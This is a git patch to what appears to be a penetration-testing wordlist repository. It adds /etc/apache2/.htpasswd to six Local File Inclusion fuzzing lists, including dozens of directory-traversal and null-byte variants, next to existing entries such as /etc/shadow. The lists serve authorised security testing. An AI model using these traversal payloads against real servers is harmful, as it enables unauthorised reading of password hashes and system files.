From 122cc78a22a114c4e1049c5606723ca4667b8f24 Mon Sep 17 00:00:00 2001
From: Jhayrolandero <108346593+Jhayrolandero@users.noreply.github.com>
Date: Sun, 29 Jun 2025 23:19:43 +0800
Subject: [PATCH] feat(wordlist): Added /etc/apache2/.htpasswd to LFI fuzzing
 lists (PR #1223)

---
 Fuzzing/LFI/LFI-Jhaddix.txt                   |  1 +
 Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt  | 40 ++++++++++++++++++-
 Fuzzing/LFI/LFI-LFISuite-pathtotest.txt       |  1 +
 .../LFI-etc-files-of-all-linux-packages.txt   |  1 +
 Fuzzing/LFI/LFI-gracefulsecurity-linux.txt    |  1 +
 ...I-linux-and-windows_by-1N3@CrowdShield.txt |  1 +
 6 files changed, 44 insertions(+), 1 deletion(-)

diff --git a/Fuzzing/LFI/LFI-Jhaddix.txt b/Fuzzing/LFI/LFI-Jhaddix.txt
index 60568e9a..53e67dbe 100644
--- a/Fuzzing/LFI/LFI-Jhaddix.txt
+++ b/Fuzzing/LFI/LFI-Jhaddix.txt
@@ -118,6 +118,7 @@ db.php
 ../../../../../../../dev
 /D:\Program Files\
 d:\System32\Inetsrv\metabase.xml
+/etc/apache2/.htpasswd
 /etc/apache2/apache2.conf
 /etc/apache2/conf/httpd.conf
 /etc/apache2/httpd.conf
diff --git a/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt b/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt
index 4e973dd8..17e274c5 100644
--- a/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt
+++ b/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt
@@ -4009,6 +4009,44 @@ proc/self/environ%00%00
 ../../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00
 ../../../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00
 ../../../../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00
+/etc/apache2/.htpasswd
+../etc/apache2/.htpasswd
+../../etc/apache2/.htpasswd
+../../../etc/apache2/.htpasswd
+../../../../etc/apache2/.htpasswd
+../../../../../etc/apache2/.htpasswd
+../../../../../../etc/apache2/.htpasswd
+../../../../../../../etc/apache2/.htpasswd
+../../../../../../../../etc/apache2/.htpasswd
+../../../../../../../../../etc/apache2/.htpasswd
+../../../../../../../../../../etc/apache2/.htpasswd
+../../../../../../../../../../../etc/apache2/.htpasswd
+../../../../../../../../../../../../etc/apache2/.htpasswd
+../../../../../../../../../../../../../etc/apache2/.htpasswd
+../../../../../../../../../../../../../../etc/apache2/.htpasswd
+../../../../../../../../../../../../../../../etc/apache2/.htpasswd
+../../../../../../../../../../../../../../../../etc/apache2/.htpasswd
+../../../../../../../../../../../../../../../../../etc/apache2/.htpasswd
+../../../../../../../../../../../../../../../../../../etc/apache2/.htpasswd
+/etc/apache2/.htpasswd%00
+../etc/apache2/.htpasswd%00
+../../etc/apache2/.htpasswd%00
+../../../etc/apache2/.htpasswd%00
+../../../../etc/apache2/.htpasswd%00
+../../../../../etc/apache2/.htpasswd%00
+../../../../../../etc/apache2/.htpasswd%00
+../../../../../../../etc/apache2/.htpasswd%00
+../../../../../../../../etc/apache2/.htpasswd%00
+../../../../../../../../../etc/apache2/.htpasswd%00
+../../../../../../../../../../etc/apache2/.htpasswd%00
+../../../../../../../../../../../etc/apache2/.htpasswd%00
+../../../../../../../../../../../../etc/apache2/.htpasswd%00
+../../../../../../../../../../../../../etc/apache2/.htpasswd%00
+../../../../../../../../../../../../../../etc/apache2/.htpasswd%00
+../../../../../../../../../../../../../../../etc/apache2/.htpasswd%00
+../../../../../../../../../../../../../../../../etc/apache2/.htpasswd%00
+../../../../../../../../../../../../../../../../../etc/apache2/.htpasswd%00
+../../../../../../../../../../../../../../../../../../etc/apache2/.htpasswd%00
 /etc/apache2/httpd.conf
 ../etc/apache2/httpd.conf
 ../../etc/apache2/httpd.conf
@@ -9510,4 +9548,4 @@ d:/boot.ini
 D:/XAMPP/logs/access.log
 d:/XAMPP/logs/access.log
 D:\XAMPP\logs\access.log
-d:\XAMPP\logs\access.log
+d:\XAMPP\logs\access.log
\ No newline at end of file
diff --git a/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt b/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt
index 3008f8ae..aea30219 100644
--- a/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt
+++ b/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt
@@ -209,6 +209,7 @@ proc/self/environ%00
 /etc/httpd/conf/httpd.conf
 /etc/apache/conf/httpd.conf
 /usr/local/etc/apache/conf/httpd.conf
+/etc/apache2/.htpasswd
 /etc/apache2/httpd.conf
 /usr/local/apache/httpd.conf
 /usr/local/apache2/httpd.conf
diff --git a/Fuzzing/LFI/LFI-etc-files-of-all-linux-packages.txt b/Fuzzing/LFI/LFI-etc-files-of-all-linux-packages.txt
index cd29003f..aa1866bb 100644
--- a/Fuzzing/LFI/LFI-etc-files-of-all-linux-packages.txt
+++ b/Fuzzing/LFI/LFI-etc-files-of-all-linux-packages.txt
@@ -191,6 +191,7 @@
 /etc/apache/ssl.prm/README
 /etc/apache/ssl.prm/snakeoil-ca-dsa.prm
 /etc/apache/ssl.prm/snakeoil-dsa.prm
+/etc/apache2/.htpasswd
 /etc/apache2/apache2.conf
 /etc/apache2/conf-available/gitweb.conf
 /etc/apache2/conf.d/apache2-doc
diff --git a/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt b/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
index cdc7f37e..ff5f4711 100644
--- a/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
+++ b/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
@@ -2,6 +2,7 @@
 /etc/shadow
 /etc/aliases
 /etc/anacrontab
+/etc/apache2/.htpasswd
 /etc/apache2/apache2.conf
 /etc/apache2/httpd.conf
 /etc/at.allow
diff --git a/Fuzzing/LFI/LFI-linux-and-windows_by-1N3@CrowdShield.txt b/Fuzzing/LFI/LFI-linux-and-windows_by-1N3@CrowdShield.txt
index 22a56a3a..9cb64bce 100644
--- a/Fuzzing/LFI/LFI-linux-and-windows_by-1N3@CrowdShield.txt
+++ b/Fuzzing/LFI/LFI-linux-and-windows_by-1N3@CrowdShield.txt
@@ -26,6 +26,7 @@
 /etc/apache/httpd.conf 
 /etc/apache2.conf
 /etc/apache2.conf 
+/etc/apache2/.htpasswd
 /etc/apache2/apache2.conf
 /etc/apache2/apache2.conf 
 /etc/apache2/conf/httpd.conf